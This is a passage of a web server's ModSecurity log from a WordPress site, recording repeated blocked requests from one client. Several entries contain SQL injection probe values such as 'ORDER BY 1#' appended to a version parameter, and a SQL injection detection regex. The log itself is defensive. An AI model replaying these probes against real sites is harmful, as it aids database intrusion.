"ZtK1xw1VuGGNTxm_kiOE5AAAAMk"] [Sat Aug 31 01:18:48.212687 2024] [:error] [pid 9366:tid 140590419261184] [client 193.29.13.20:37916] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1yA1VuGGNTxm_kiOE5QAAAMg"] [Sat Aug 31 01:18:48.726305 2024] [:error] [pid 9366:tid 140590335334144] [client 193.29.13.20:37918] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1yA1VuGGNTxm_kiOE5gAAANI"] [Sat Aug 31 01:18:49.178430 2024] [:error] [pid 9366:tid 140590318548736] [client 193.29.13.20:37920] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1yQ1VuGGNTxm_kiOE5wAAANQ"] [Sat Aug 31 01:18:49.614165 2024] [:error] [pid 8676:tid 140590352119552] [client 193.29.13.20:37922] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1yWm8LEssXUq6wJ2LPgAAAJA"] [Sat Aug 31 01:18:50.034454 2024] [:error] [pid 9366:tid 140590436046592] [client 193.29.13.20:37924] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1yg1VuGGNTxm_kiOE6AAAAMY"] [Sat Aug 31 01:18:50.672140 2024] [:error] [pid 9366:tid 140590394083072] [client 193.29.13.20:37926] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1yg1VuGGNTxm_kiOE6QAAAMs"] [Sat Aug 31 01:18:51.171119 2024] [:error] [pid 8676:tid 140590310156032] [client 193.29.13.20:37928] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47) ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1y2m8LEssXUq6wJ2LPwAAAJU"] [Sat Aug 31 01:18:51.722368 2024] [:error] [pid 8675:tid 140590377297664] [client 193.29.13.20:37930] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1y5dLCjsWrLhZKAOZfwAAAE0"] [Sat Aug 31 01:18:52.162207 2024] [:error] [pid 8676:tid 140590548489984] [client 193.29.13.20:37932] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1zGm8LEssXUq6wJ2LQAAAAIE"] [Sat Aug 31 01:18:52.723998 2024] [:error] [pid 8676:tid 140590531704576] [client 193.29.13.20:37934] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1zGm8LEssXUq6wJ2LQQAAAIM"] [Sat Aug 31 01:18:53.242100 2024] [:error] [pid 8676:tid 140590343726848] [client 193.29.13.20:37936] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1zWm8LEssXUq6wJ2LQgAAAJE"] [Sat Aug 31 01:18:53.685281 2024] [:error] [pid 8676:tid 140590335334144] [client 193.29.13.20:37938] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1zWm8LEssXUq6wJ2LQwAAAJI"] [Sat Aug 31 01:18:54.142781 2024] [:error] [pid 8676:tid 140590301763328] [client 193.29.13.20:37940] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1zmm8LEssXUq6wJ2LRAAAAJY"] [Sat Aug 31 01:18:54.606422 2024] [:error] [pid 8676:tid 140590385690368] [client 193.29.13.20:37942] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1zmm8LEssXUq6wJ2LRQAAAIw"] [Sat Aug 31 01:18:55.219998 2024] [:error] [pid 9366:tid 140590352119552] [client 193.29.13.20:37944] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1zw1VuGGNTxm_kiOE6gAAANA"] [Sat Aug 31 01:18:55.720062 2024] [:error] [pid 9366:tid 140590284977920] [client 193.29.13.20:37946] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1zw1VuGGNTxm_kiOE6wAAANg"] [Sat Aug 31 01:18:56.077287 2024] [:error] [pid 9366:tid 140590540097280] [client 193.29.13.20:37948] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK10A1VuGGNTxm_kiOE7AAAAMI"] [Sat Aug 31 01:18:56.568813 2024] [:error] [pid 9366:tid 140590301763328] [client 193.29.13.20:37950] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47 ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK10A1VuGGNTxm_kiOE7QAAANY"] [Sat Aug 31 01:18:56.961528 2024] [:error] [pid 9366:tid 140590377297664] [client 193.29.13.20:37952] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK10A1VuGGNTxm_kiOE7gAAAM0"] [Sat Aug 31 01:18:57.523364 2024] [:error] [pid 9366:tid 140590444439296] [client 193.29.13.20:37954] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK10Q1VuGGNTxm_kiOE7wAAAMU"] [Sat Aug 31 01:18:57.870144 2024] [:error] [pid 9366:tid 140590402475776] [client 193.29.13.20:37956] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK10Q1VuGGNTxm_kiOE8AAAAMo"] [Sat Aug 31 01:18:58.215348 2024] [:error] [pid 9366:tid 140590368904960] [client 193.29.13.20:37958] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK10g1VuGGNTxm_kiOE8QAAAM4"] [Sat Aug 31 01:18:58.716771 2024] [:error] [pid 9366:tid 140590531704576] [client 193.29.13.20:37960] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK10g1VuGGNTxm_kiOE8gAAAMM"] [Sat Aug 31 01:18:59.055738 2024] [:error] [pid 9366:tid 140590452832000] [client 193.29.13.20:37962] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK10w1VuGGNTxm_kiOE8wAAAMQ"] [Sat Aug 31 01:18:59.545301 2024] [:error] [pid 8676:tid 140590402475776] [client 193.29.13.20:37964] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK102m8LEssXUq6wJ2LRgAAAIo"] [Sat Aug 31 01:18:59.977862 2024] [:error] [pid 8676:tid 140590427653888] [client 193.29.13.20:37966] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK102m8LEssXUq6wJ2LRwAAAIc"] [Sat Aug 31 01:19:00.501877 2024] [:error] [pid 8676:tid 140590394083072] [client 193.29.13.20:37968] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK11Gm8LEssXUq6wJ2LSAAAAIs"] [Sat Aug 31 01:19:00.929368 2024] [:error] [pid 8676:tid 140590377297664] [client 193.29.13.20:37970] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK11Gm8LEssXUq6wJ2LSQAAAI0"] [Sat Aug 31 01:19:01.335580 2024] [:error] [pid 9366:tid 140590410868480] [client 193.29.13.20:37972] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47') ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK11Q1VuGGNTxm_kiOE9AAAAMk"] [Sat Aug 31 01:19:01.784115 2024] [:error] [pid 8676:tid 140590410868480] [client 193.29.13.20:37974] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK11Wm8LEssXUq6wJ2LSgAAAIk"] [Sat Aug 31 01:19:02.417811 2024] [:error] [pid 